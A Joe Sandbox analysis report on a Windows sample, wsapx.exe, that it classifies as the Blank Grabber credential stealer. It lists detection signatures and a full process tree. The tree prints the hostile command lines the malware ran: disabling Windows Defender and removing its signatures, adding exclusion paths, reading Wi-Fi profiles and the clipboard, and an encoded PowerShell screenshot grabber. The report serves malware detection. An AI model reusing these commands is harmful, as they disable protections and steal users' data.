Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wsapx.exe

Overview

General Information

Sample name:wsapx.exe
Analysis ID:1574324
MD5:e302186ae6217d48fc6eef1fe780ec26
SHA1:17fcd5699fc208e8b520eb9ad1c0b4a0305a5f0a
SHA256:3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672
Tags:exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wsapx.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\wsapx.exe" MD5: E302186AE6217D48FC6EEF1FE780EC26)
    • wsapx.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\wsapx.exe" MD5: E302186AE6217D48FC6EEF1FE780EC26)
      • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7676 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7664 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 420 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7720 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7768 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7892 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8156 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4176 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2436 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5644 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6812 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7020 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2784 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5644 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7232 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8036 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3192 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8044 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 800 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6852 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7452 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 3416 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 2688 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7892 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5328 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 3192 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
